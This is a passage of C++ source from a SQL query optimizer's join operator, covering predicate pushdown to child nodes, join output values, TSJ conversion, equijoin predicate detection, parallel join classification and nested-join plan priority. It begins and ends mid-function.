------------------------------------------------------------------- joinPred().lookForVEGPredicates(VEGEqPreds2); // ------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T2.a,3}) needn't be retained at this Join node after // pushed down to Scan T2. (There is an exception to this. See later.) // ------------------------------------------------------------------- VEGEqPreds2.removeCoveredExprs(availableInputs); //newExternalInputs // ------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // ------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) VEGEqPreds2.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // ------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // ------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds2, exprOnParent); // --------------------------------------------------------------------- // Now, there are additional join predicates that must be retained // even if they are pushable to the second child. An example would be // VEGPred(VEG{T1.a,T2.a,10}). For an inner join, this predicate can // be pushed to Scan T1 and Scan T2 and evaluated as (T1.a=10) and // (T2.a=10) respectively. However, for a Left Join or Anti-Semi Join, // this predicate (if it's a join predicate) cannot be pushed down to // the first child. The (T1.a=10) part must then be retained at this // Join node. These types of VEGPreds are those covered by T1 and the // external inputs. // --------------------------------------------------------------------- ValueIdSet joinPredsThatStay; joinPredsThatStay = joinPred(); ValueIdSet availableValues = availableInputs; //newExternalInputs availableValues += child(0).getGroupAttr()->getCharacteristicOutputs(); joinPredsThatStay.removeUnCoveredExprs(availableValues); // --------------------------------------------------------------------- // However, we don't want VEGPred like VEGPred(VEG{T2.a,10}) which // actually does not reference an output of T1. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) joinPredsThatStay.removeUnReferencedVEGPreds( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Also, if some inputs have been taken out deliberately, we want to // make sure other predicates which references the inputs taken out // are going to stay. Otherwise, we will have the issue that not // sufficient values are available at the child to ensure correctness // in evaluating the predicates pushed down to it. The same predicate // must be re-evaluated at this JOIN node. // --------------------------------------------------------------------- if (NOT inputsTakenOut.isEmpty()) { ValueIdSet moreJoinPredsThatStay; joinPred().lookForVEGPredicates(moreJoinPredsThatStay); moreJoinPredsThatStay.removeUnReferencedVEGPreds(inputsTakenOut); joinPredsThatStay += moreJoinPredsThatStay; } // --------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPredsThatStay, exprOnParent); //---------------------------------------------------------------------- // Solution 10-030728-8252: check if the second child could produce // expressions of type Instnull(CAST(aggregate)). // See if the CAST could be pushed // up. The Groupby node does not manufacture expressions of the type // cast(aggregate) as outputs in the generator. So do not ask for them //---------------------------------------------------------------------- exprOnParent.replaceInstnullCastAggregateWithAggregateInLeftJoins(this); // --------------------------------------------------------------------- // STEP 2B: Perform pushdown to the second child, and add reqd preds // back to the join predicates after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, availableInputs, joinPred(), &exprOnParent, 1); // --------------------------------------------------------------------- // Add back those predicates which must stay with the JOIN even after // they are pushed to the second child. // --------------------------------------------------------------------- joinPred() += VEGEqPreds2; joinPred() += joinPredsThatStay; } else { // STEP 1: Gather all values the children must still produce even if // predicates are pushed down. // // Find all the "true join VEGPreds" in predicates. E.g, VEGPred(VEG{ // T1.a,T2.a}) will be pushed down to Scan T1 and to Scan T2 even if // not both values are availble at either node. Therefore, we still // need to keep a copy of this type of predicates here at this Join node // where both T1.a and T2.a will be available. That means the children // need to provide these values to the Join node. The only exception is // when we are doing a TSJ. The predicates are then all pushed to the // right child, and the right child could then *not* provide the value // to the Join node if it's not a required output from the Join. // --------------------------------------------------------------------- ValueIdSet VEGEqPreds; predicates1.lookForVEGPredicates(VEGEqPreds); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after // it's pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) VEGEqPreds.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate could be pushed // down to the first child without being retained at JOIN2. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild1) VEGEqPreds.removeUnCoveredExprs( child(1).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Since these predicates will be retained at the Join (or pushed down // to the second child in the case of a TSJ), make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds, exprOnParent); // --------------------------------------------------------------------- // STEP 2: Try pushing down to the first child. // --------------------------------------------------------------------- if (child(0).getPtr()->getOperator().match(REL_ANY_SEMIJOIN) || child(0).getPtr()->getOperator().match(REL_ANY_TSJ)) { computeValuesReqdForPredicates(predicates1, exprOnParent1); ValueIdSet emptySet; RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent1, 0); } else { RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicates1, &exprOnParent, 0); } // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to first child. // --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates1); // --------------------------------------------------------------------- // STEP 3: Try pushing to second child now. // --------------------------------------------------------------------- if (child(1).getPtr()->getOperator().match(REL_ANY_SEMIJOIN) || (child(1).getPtr()->getOperator().match(REL_ANY_TSJ) && (child(1).getPtr()->getOperator() != REL_ROUTINE_JOIN))) { computeValuesReqdForPredicates(predicates2, exprOnParent2); ValueIdSet emptySet; RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent2, 1); } else { // We do not want to push predicates to the right child of a // routineJoin. if (!isRoutineJoin()) { RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicates2, &exprOnParent, 1); } } // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to second child. // --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates2); // ------------------------------------------------------------------- // If this is a inner-join that is not a TSJ we need to add all the // true join VEGPreds back to selection predicates. // ------------------------------------------------------------------- predicatesOnParent += VEGEqPreds; } } // Join::pushdownCoveredExprSQO void Join::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); switch (getOperatorType()) { case REL_JOIN: case REL_MERGE_JOIN: case REL_NESTED_JOIN: case REL_HASH_JOIN: case REL_HYBRID_HASH_JOIN: case REL_ORDERED_HASH_JOIN: case REL_INDEX_JOIN: case REL_ROUTINE_JOIN: case REL_TSJ: { // Potentially, all the values that are produced by // my left child as well as my right child. outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); outputValues += child(1).getGroupAttr()->getCharacteristicOutputs(); break; } case REL_LEFT_JOIN: case REL_LEFT_NESTED_JOIN: case REL_LEFT_MERGE_JOIN: case REL_LEFT_ORDERED_HASH_JOIN: case REL_LEFT_HYBRID_HASH_JOIN: case REL_LEFT_TSJ: { // Potentially, all the values that are produced by // my left child and all null instantiated values from // my right child. outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); outputValues.insertList(nullInstantiatedOutput()); break; } case REL_FULL_JOIN: case REL_UNION_JOIN: case REL_FULL_HYBRID_HASH_JOIN: { // Potentially, all the values that are produced by // my left child and the right child. Since it's a FULL_OUTER_JOIN // all null instantiated values from my right and left child. outputValues.insertList(nullInstantiatedOutput()); outputValues.insertList(nullInstantiatedForRightJoinOutput()); break; } case REL_SEMIJOIN: case REL_ANTI_SEMIJOIN: case REL_SEMITSJ: case REL_ANTI_SEMITSJ: case REL_HASH_SEMIJOIN: case REL_HASH_ANTI_SEMIJOIN: case REL_MERGE_SEMIJOIN: case REL_MERGE_ANTI_SEMIJOIN: case REL_HYBRID_HASH_SEMIJOIN: case REL_HYBRID_HASH_ANTI_SEMIJOIN: case REL_ORDERED_HASH_SEMIJOIN: case REL_ORDERED_HASH_ANTI_SEMIJOIN: case REL_NESTED_SEMIJOIN: case REL_NESTED_ANTI_SEMIJOIN: { // No value from my right child can appear in my output. outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); break; } case REL_TSJ_FLOW: case REL_NESTED_JOIN_FLOW: { // No value from my left child can appear in my output. outputValues += child(1).getGroupAttr()->getCharacteristicOutputs(); break; } default: { ABORT("Unsupported join type in Join::getPotentialOutputValues()"); break; } } // switch } // Join::getPotentialOutputValues() CostScalar Join::computeMinEstRCForGroup() { CostScalar minCard = csOne; GroupAttributes * ga = getGroupAttr(); RelExpr * logExpr = ga->getLogExprForSynthesis(); if (logExpr != NULL) { logExpr->finishSynthEstLogProp(); minCard = ga->getMinChildEstRowCount(); } return minCard; } // get the highest reduction from local predicates for cols of this join CostScalar Join::highestReductionForCols(ValueIdSet colSet) { // if the child is anything other than scan, then we assume the reduction to be 1 // but before that we still need to see if the column set that we are looking for // belongs to this child or not. // since we don't know to which child tableOne belongs, we shall look at both left // and right histograms for the columns. Start with the left child ColStatDescList completeList = child(0).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); ColStatDescList rightColStatList = child(1).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); // form a complete list of histograms from both sides completeList.makeDeepCopy(rightColStatList); // Compute reduction for this column set CostScalar highestUecRedByLocalPreds = highestUecRedByLocalPreds = completeList.getHighestUecReductionByLocalPreds(colSet); return highestUecRedByLocalPreds; } const NAString Join::getText() const { NAString result; switch (getOperatorType()) { case REL_JOIN: result += "join"; break; case REL_LEFT_JOIN: result += "left_join"; break; case REL_RIGHT_JOIN: result += "right_join"; break; case REL_FULL_JOIN: result += "full_join"; break; case REL_UNION_JOIN: result += "union_join"; break; case REL_ROUTINE_JOIN: result += "routine_join"; break; case REL_TSJ: result += "tsj"; break; case REL_TSJ_FLOW: result += "tsj_flow"; break; case REL_LEFT_TSJ: result += "left_tsj"; break; case REL_SEMIJOIN: result += "semi_join"; break; case REL_ANTI_SEMIJOIN: result += "anti_semi_join"; break; case REL_SEMITSJ: result += "semi_tsj"; break; case REL_ANTI_SEMITSJ: result += "anti_semi_tsj"; break; case REL_INDEX_JOIN: result += "index_join"; break; default: result += "UNKNOWN??"; break; } // switch if(CmpCommon::getDefault(COMP_BOOL_183) == DF_ON) { Int32 potential = getPotential(); if(potential < 0) { result += "_-"+ istring(-1*potential); } else result += "_" + istring(potential); } return result; } // Join::getText() HashValue Join::topHash() { HashValue result = RelExpr::topHash(); result ^= joinPred_; return result; } NABoolean Join::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; Join &o = (Join &) other; if (joinPred_ != o.joinPred_) return FALSE; // Temp member to seperate joins PTRule from others in cascades memo if (joinFromPTRule_ != o.joinFromPTRule_) return FALSE; if (joinForZigZag_ != o.joinForZigZag_) return FALSE; if (avoidHalloweenR2_ != o.avoidHalloweenR2_) return FALSE; if (halloweenForceSort_ != o.halloweenForceSort_) return FALSE; return TRUE; } RelExpr * Intersect::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) Intersect(NULL, NULL ); } else result = derivedNode; return RelExpr::copyTopNode(result, outHeap); } RelExpr * Except::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) { result = new (outHeap) Except(NULL, NULL ); } else result = derivedNode; return RelExpr::copyTopNode(result, outHeap); } RelExpr * Join::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Join *result; if (derivedNode == NULL) result = new (outHeap) Join(NULL, NULL, getOperatorType(), NULL, FALSE, FALSE, outHeap); else result = (Join *) derivedNode; // copy join predicate parse tree (parser only) if (joinPredTree_ != NULL) result->joinPredTree_ = joinPredTree_->copyTree(outHeap)->castToItemExpr(); result->joinPred_ = joinPred_; // Copy the uniqueness flags result->leftHasUniqueMatches_ = leftHasUniqueMatches_; result->rightHasUniqueMatches_ = rightHasUniqueMatches_; // Copy the equijoin predicates result->equiJoinPredicates_ = equiJoinPredicates_; result->equiJoinExpressions_ = equiJoinExpressions_; result->nullInstantiatedOutput() = nullInstantiatedOutput(); result->nullInstantiatedForRightJoinOutput() = nullInstantiatedForRightJoinOutput(); result->transformComplete_ = transformComplete_; // Copy the required order, if any, that originated from an insert node result->reqdOrder_ = reqdOrder_; // copy flag that marks a mandatory TSJ which could not be unnested result->tsjAfterSQO_ = tsjAfterSQO_; // Copy the flag that indicates if this is a TSJ for a write operation result->tsjForWrite_ = tsjForWrite_; result->tsjForUndo_ = tsjForUndo_; result->tsjForSetNFError_ = tsjForSetNFError_; result->tsjForMerge_ = tsjForMerge_; result->tsjForMergeWithInsert_ = tsjForMergeWithInsert_; result->tsjForMergeUpsert_ = tsjForMergeUpsert_; result->tsjForSideTreeInsert_ = tsjForSideTreeInsert_; result->enableTransformToSTI_ = enableTransformToSTI_; result->forcePhysicalJoinType_ = forcePhysicalJoinType_; result->derivedFromRoutineJoin_ = derivedFromRoutineJoin_; // Temp member to seperate joins PTRule from others in cascades memo result->joinFromPTRule_ = joinFromPTRule_; result->joinForZigZag_ = joinForZigZag_; result->sourceType_ = sourceType_; result->rowsetRowCountArraySize_ = rowsetRowCountArraySize_; result->avoidHalloweenR2_ = avoidHalloweenR2_; result->halloweenForceSort_ = halloweenForceSort_; result->candidateForSubqueryUnnest_ = candidateForSubqueryUnnest_; result->candidateForSubqueryLeftJoinConversion_ = candidateForSubqueryLeftJoinConversion_; result->candidateForSemiJoinTransform_ = candidateForSemiJoinTransform_; result->predicatesToBeRemoved_ = predicatesToBeRemoved_; //++MV result->rightChildMapForLeftJoin_ = rightChildMapForLeftJoin_; //--MV result->isIndexJoin_ = isIndexJoin_; if(!result->isInnerNonSemiJoin()) result->floatingJoin_ = floatingJoin_; result->allowPushDown_ = allowPushDown_; result->extraHubNonEssentialOutputs_ = extraHubNonEssentialOutputs_; result->isForTrafLoadPrep_ = isForTrafLoadPrep_; result->beforeJoinPredOnOuterOnly_ = beforeJoinPredOnOuterOnly_; return RelExpr::copyTopNode(result, outHeap); } void Join::addJoinPredTree(ItemExpr *joinPred) { ExprValueId j = joinPredTree_; ItemExprTreeAsList(&j, ITM_AND).insert(joinPred); joinPredTree_ = j.getPtr(); } ItemExpr * Join::removeJoinPredTree() { ItemExpr * result = joinPredTree_; joinPredTree_ = NULL; return result; } void Join::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (joinPredTree_ != NULL OR NOT joinPred_.isEmpty()) { if (joinPred_.isEmpty()) xlist.insert(joinPredTree_); else xlist.insert(joinPred_.rebuildExprTree()); llist.insert("other_join_predicates"); } RelExpr::addLocalExpr(xlist,llist); } void Join::convertToTsj() { switch (getOperatorType()) { case REL_JOIN: setOperatorType(REL_TSJ); break; case REL_LEFT_JOIN: setOperatorType(REL_LEFT_TSJ); break; case REL_SEMIJOIN: setOperatorType(REL_SEMITSJ); break; case REL_ANTI_SEMIJOIN: setOperatorType(REL_ANTI_SEMITSJ); break; default: ABORT("Internal error: Join::convertTsj()"); break; } } // Join::convertToTsj() void Join::convertToNotTsj() { switch (getOperatorType()) { case REL_TSJ: case REL_TSJ_FLOW: case REL_ROUTINE_JOIN: setOperatorType(REL_JOIN); break; case REL_LEFT_TSJ: setOperatorType(REL_LEFT_JOIN); break; case REL_SEMITSJ: setOperatorType(REL_SEMIJOIN); break; case REL_ANTI_SEMITSJ: setOperatorType(REL_ANTI_SEMIJOIN); break; default: ABORT("Internal error: Join::convertTsj()"); break; } } // Join::convertToNotTsj() void Join::convertToNotOuterJoin() { switch (getOperatorType()) { case REL_LEFT_JOIN: setOperatorType(REL_JOIN); break; case REL_LEFT_TSJ: setOperatorType(REL_TSJ); break; default: ABORT("Internal error: Join::convertOuterJoin()"); break; } // end switch } // Join::convertToNotOuterJoin() // ---------------------------------------------------------------------------- // This procedure gets called when synthesising logical properties. // It finds all the equijoin predicates and saves them in equiJoinPredicates_ // But leaves them in the originating selectionPred()/joinPred() // --------------------------------------------------------------------------- void Join::findEquiJoinPredicates() { ValueIdSet allJoinPredicates; ValueId leftExprId, rightExprId; NABoolean predicateIsOrderPreserving; ItemExpr* expr; equiJoinPredicates_.clear(); equiJoinExpressions_.clear(); // If this is a TSJ there is nothing to analyze. All join predicates // have been pushed down to the second child. if(isTSJ()) return; if (isInnerNonSemiJoin()) { allJoinPredicates = selectionPred(); CMPASSERT(joinPred().isEmpty()); } else { // for an outer or semi join, the ON clause is stored in "joinPred" // while the WHERE clause is stored in "selectionPred". allJoinPredicates = joinPred(); } // remove any predicates covered by the inputs allJoinPredicates.removeCoveredExprs(getGroupAttr()-> getCharacteristicInputs()); for (ValueId exprId = allJoinPredicates.init(); allJoinPredicates.next(exprId); allJoinPredicates.advance(exprId)) { expr = exprId.getItemExpr(); if (expr->isAnEquiJoinPredicate(child(0).getGroupAttr(), child(1).getGroupAttr(), getGroupAttr(), leftExprId, rightExprId, predicateIsOrderPreserving)) { equiJoinPredicates_ += exprId; equiJoinExpressions_.addMapEntry(leftExprId, rightExprId); } } } // Join::findEquiJoinPredicates() // --------------------------------------------------------------------------- // separateEquiAndNonEquiJoinPredicates is called from the Join // implementation rules to weed out of equiJoinPredicates_ all // the predicates that can be used by the join. The equiJoin // predicates for the physical operator will be remove from // the selectioPred() or joinPred() where they came from. // --------------------------------------------------------------------------- void Join::separateEquiAndNonEquiJoinPredicates (const NABoolean joinStrategyIsOrderSensitive) { ValueId leftExprId, rightExprId; NABoolean predicateIsOrderPreserving; ItemExpr* expr; // equiJoinPredicates_ has all the equijoin predicates found // when synthesing logical properties. It is a subset of // either selectionPred() or joinPred() ValueIdSet foundEquiJoinPredicates = equiJoinPredicates_; equiJoinPredicates_.clear(); equiJoinExpressions_.clear(); // remove any predicates covered by the inputs foundEquiJoinPredicates.removeCoveredExprs(getGroupAttr()-> getCharacteristicInputs()); for (ValueId exprId = foundEquiJoinPredicates.init(); foundEquiJoinPredicates.next(exprId); foundEquiJoinPredicates.advance(exprId)) { expr = exprId.getItemExpr(); if (expr->isAnEquiJoinPredicate(child(0).getGroupAttr(), child(1).getGroupAttr(), getGroupAttr(), leftExprId, rightExprId, predicateIsOrderPreserving)) { if ( (NOT joinStrategyIsOrderSensitive) OR (joinStrategyIsOrderSensitive AND predicateIsOrderPreserving) ) { equiJoinPredicates_ += exprId; equiJoinExpressions_.addMapEntry(leftExprId, rightExprId); } } else { CMPASSERT(0); // We knew it was an equijoin predicate already } } if (isInnerNonSemiJoin()) { selectionPred() -= equiJoinPredicates_; CMPASSERT(joinPred().isEmpty()); } else { // for an outer or semi join, the ON clause is stored in "joinPred" // while the WHERE clause is stored in "selectionPred". joinPred() -= equiJoinPredicates_; } // Since we have changed the set of equijoin predicates we will consider // we should resyhtnesize the left/rightHasUnqiueMatches_ flags synthConstraints(NULL); } // Join::separateEquiAndNonEquiJoinPredicates() void Join::flipChildren() { NABoolean flipUnique; flipUnique = leftHasUniqueMatches_; leftHasUniqueMatches_ = rightHasUniqueMatches_; rightHasUniqueMatches_ = flipUnique; equiJoinExpressions_.flipSides(); } // Join::flipChildren() // --------------------------------------------------------------------------- // get the parallel join type and return additional info (optional) // // 0: serial join // 1: TYPE1 join (matching partitions on both sides, including SkewBuster) // 2: TYPE2 join (join one partition on one side with the // entire table on the other side) // --------------------------------------------------------------------------- Int32 Join::getParallelJoinType(ParallelJoinTypeDetail *optionalDetail) const { Int32 result = 0; ParallelJoinTypeDetail detailedType = Join::PAR_NONE; const PartitioningFunction *mpf = NULL; const PartitioningFunction *cpf = NULL; if (getPhysicalProperty()) mpf = getPhysicalProperty()->getPartitioningFunction(); if (mpf == NULL OR mpf->getCountOfPartitions() <= 1) { // no parallelism or unknown parallelism, not a parallel join if (optionalDetail) *optionalDetail = detailedType; return 0; } if (child(1)->getPhysicalProperty()) cpf = child(1)->getPhysicalProperty()->getPartitioningFunction(); CMPASSERT( cpf ); if (cpf->castToLogPhysPartitioningFunction()) { // only the child of a join in DP2 can have a logphys part func DCMPASSERT(getPhysicalProperty()->executeInDP2()); cpf = cpf->castToLogPhysPartitioningFunction()-> getPhysPartitioningFunction(); } if (cpf->isAReplicateViaBroadcastPartitioningFunction() OR cpf->isAReplicateNoBroadcastPartitioningFunction()) { // Right child replicates, now check my own partitioning // function to see whether this node just passes on the // replication function. if (mpf->castToLogPhysPartitioningFunction()) { // only a join in DP2 can have a logphys part func DCMPASSERT(getPhysicalProperty()->executeInDP2()); // check the physical part. func of the join in DP2 mpf = mpf->castToLogPhysPartitioningFunction()-> getPhysPartitioningFunction(); } if (NOT mpf->isAReplicateViaBroadcastPartitioningFunction() AND NOT mpf->isAReplicateNoBroadcastPartitioningFunction()) { // See if the right child REALLY replicates data. If this is // a nested join and the chosen plan was a "preferred probing // order" plan, then this is really a type 1 join, because a // ppo plan always demands the two tables be logically // partitioned the same way. if (isNestedJoin() && ((NestedJoin*)this)->probesInOrder()) { result = 1; detailedType = PAR_OCR; } else { // right child replicates data, and the node itself doesn't, // this is a type 2 join result = 2; if (isNestedJoin()) detailedType = PAR_N2J; } } else { // Both the right child and the parent replicate data. // This is not a parallel join, it is a join that simply // passes its replication requirement down to both of its // children. The join will be executed in multiple ESPs, // but it will not employ one of the two parallel algorithms // (TYPE1 or TYPE2). result = 0; } } else { // right child is partitioned, but does not replicate, parallel type 1 join or SkewBuster or OCB PartitioningFunction *opf = NULL; if (child(0)->getPhysicalProperty()) opf = child(0)->getPhysicalProperty()->getPartitioningFunction(); if (opf->isAReplicateViaBroadcastPartitioningFunction()) { // this is an OCB join, which is considered type2 result = 2; detailedType = PAR_OCB; } else { // the regular TYPE1 join (including SkewBuster) result = 1; if (opf->isASkewedDataPartitioningFunction()) detailedType = PAR_SB; } } if (optionalDetail) *optionalDetail = detailedType; return result; } // --------------------------------------------------------------------- // Method to split the order req between the two join children. // return FALSE if not possible // --------------------------------------------------------------------- NABoolean Join::splitOrderReq( const ValueIdList& myOrderReq, /*IN*/ ValueIdList& orderReqOfChild0, /*OUT*/ ValueIdList& orderReqOfChild1 /*OUT*/) const { NABoolean partOfChild0List = TRUE; ValueId exprId; GroupAttributes* child0GA = child(0).getGroupAttr(); GroupAttributes* child1GA = child(1).getGroupAttr(); orderReqOfChild0.clear(); orderReqOfChild1.clear(); for (CollIndex ix = 0; ix < myOrderReq.entries(); ix++) { exprId = myOrderReq.at(ix); // dummy variables for the cover test ValueIdSet newInputs,referencedInputs, coveredSubExpr,uncoveredExpr; NABoolean coveredByChild0 = child0GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr); if (NOT coveredByChild0) partOfChild0List = FALSE; if (partOfChild0List) orderReqOfChild0.insertAt(orderReqOfChild0.entries(),exprId); else // i.e. NOT partOfChild0List { //++MV // For left join we need to translate the required sort key to // the right child outputs because there is an InstantiateNull function // on all of the right child outputs. The InstantiateNull function will // cause the cover test to fail and therefore the optimization that merge // the left child sort key with the right child sort key will fail // For more information see NestedJoin::synthPhysicalProperty() if (isLeftJoin()) { const ValueIdMap &map = rightChildMapForLeftJoin(); ValueId tempExprId = exprId; map.mapValueIdDown(tempExprId, exprId); } //--MV coveredSubExpr.clear(); uncoveredExpr.clear(); NABoolean coveredByChild1 = child1GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr); if (coveredByChild1) { orderReqOfChild1.insertAt(orderReqOfChild1.entries(),exprId); } else // i.e NOT (partOfChild0List || coveredByChild1) { orderReqOfChild0.clear(); orderReqOfChild1.clear(); return FALSE; } } } // end for all expressions in the required order // Check to see if it is possible to split the order if (child0GA->isUnique(orderReqOfChild0) OR (child0GA->getMaxNumOfRows() <= 1) OR (orderReqOfChild1.entries() == 0)) { return TRUE; } else { orderReqOfChild0.clear(); orderReqOfChild1.clear(); return FALSE; } } // end splitOrderReq() // --------------------------------------------------------------------- // method to split the arrangement req between the two join childs. // return FALSE if not possible // --------------------------------------------------------------------- NABoolean Join::splitArrangementReq( const ValueIdSet& myArrangReq, /*IN*/ ValueIdSet& ArrangReqOfChild0, /*OUT*/ ValueIdSet& ArrangReqOfChild1 /*OUT*/) const { ArrangReqOfChild0.clear(); ArrangReqOfChild1.clear(); ValueId exprId; GroupAttributes* child0GA = child(0).getGroupAttr(); GroupAttributes* child1GA = child(1).getGroupAttr(); for (exprId = myArrangReq.init(); myArrangReq.next(exprId); myArrangReq.advance(exprId)) { // dummy variables for the cover test ValueIdSet newInputs,referencedInputs, coveredSubExpr,uncoveredExpr; // First we see if this element is covered by child 0 if (child0GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr)) { ArrangReqOfChild0.insert(exprId); } // Only if an element is not covered by Child0 then we check // Child1. i.e. if it is covered by both we bill it to Child0. else { coveredSubExpr.clear(); uncoveredExpr.clear(); if (child1GA->covers(exprId, newInputs, referencedInputs, &coveredSubExpr, &uncoveredExpr)) { ArrangReqOfChild1.insert(exprId); } else { // If the expression was not covered soley by one of the children, then // we must give up. For example, "T1.a * T2.a" needs both children. ArrangReqOfChild0.clear(); ArrangReqOfChild1.clear(); return FALSE; } } // end if not covered by child0 } // end for all expressions in the required arrangement // Check to see if it is possible to split the arrangement if (child0GA->isUnique(ArrangReqOfChild0) OR (child0GA->getMaxNumOfRows() <= 1) OR (ArrangReqOfChild1.entries() == 0)) { return TRUE; } else { ArrangReqOfChild0.clear(); ArrangReqOfChild1.clear(); return FALSE; } } // end splitArrangementReq() NABoolean Join::ownsVEGRegions() const { return isLeftJoin() OR isAntiSemiJoin() OR isFullOuterJoin(); } PlanPriority NestedJoin::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); NABoolean applySerialPremium = TRUE; double val; Cardinality minrows, maxrows; CostScalar expectedrows = child(0).getGroupAttr()->getResultCardinalityForEmptyInput(); if (child(0).getGroupAttr()->hasCardConstraint(minrows, maxrows) && (maxrows <= ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_99) OR CostScalar(maxrows) < CostScalar(1.2) * expectedrows)) { // a nested join with at most N outer rows is NOT risky val = 1.0; // In this case premium for serial plan can be waived because cost of // starting ESPs over weighs any benefit we get from parallel plan. // Fix is controlled by COMP_BOOL_75, default value is ON. if (CmpCommon::getDefault(COMP_BOOL_75) == DF_ON) applySerialPremium = FALSE; } else if (context->getInputLogProp() && context->getInputLogProp()->getResultCardinality().value() > 1) { // temporary workaround until we cost HJ under NJ correctly val = 1.0; } else { // a nested join with more than N outer rows is considered risky val = CURRSTMT_OPTDEFAULTS->riskPremiumNJ(); // nested join cache should have a lower risk premium GroupAttributes &rightGA = *child(1).getGroupAttr(); NABoolean probeIsUnique = rightGA.isUnique(rightGA.getCharacteristicInputs()); NABoolean isTypeOfSemiJoin = isSemiJoin() || isAntiSemiJoin(); if ((probeIsUnique || isTypeOfSemiJoin) && (rowsFromRightHaveUniqueMatch() == FALSE) && (getOperatorType() != REL_NESTED_JOIN_FLOW) && (isTSJForWrite() == FALSE ) && (getGroupAttr()-> isEmbeddedUpdateOrDelete() == FALSE ) && (!spp->executeInDP2()) && (CmpCommon::getDefault(NESTED_JOIN_CACHE) != DF_OFF)) { double red=ActiveSchemaDB()->getDefaults().getAsDouble(COMP_INT_89); if (red > 1) { // reduce risk premium because it's a nested join cache operator val = 1 + (val - 1) / red; } } } if (degreeOfParallelism <= 1 && applySerialPremium) { // serial plans are risky. exact an insurance premium from serial plans. val *= CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); } CostScalar premium(val); PlanPriority result(0, 0, premium); // esp parallelism priority logic below does not apply to operators in dp2 if(spp->executeInDP2()) return result; // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } // fix for SAP case 10-100602-2913, soln 10-100602-0803 // long-running select for DSO activation, query plan for empty table // if nested join has // 1) a tuple list (something with 0 base tables) on left, and // 2) a table on right, and // 3) prefer_key_nested_join is set, and // 4) table's predicate (including pushed join pred) forms begin/end // key on table, and // 5) tuple list is of reasonable size (<= tuplelist_size_threshold), // and // 6) table is small or has no stats // then give nested join plan higher priority // push it by 1 if it has a key range predicate // push it by 2 if it has a unique key predicate // is prefer_key_nested_join active? NABoolean prefer_key_nested_join = (CmpCommon::getDefault(SAP_PREFER_KEY_NESTED_JOIN) == DF_ON); if (prefer_key_nested_join) { 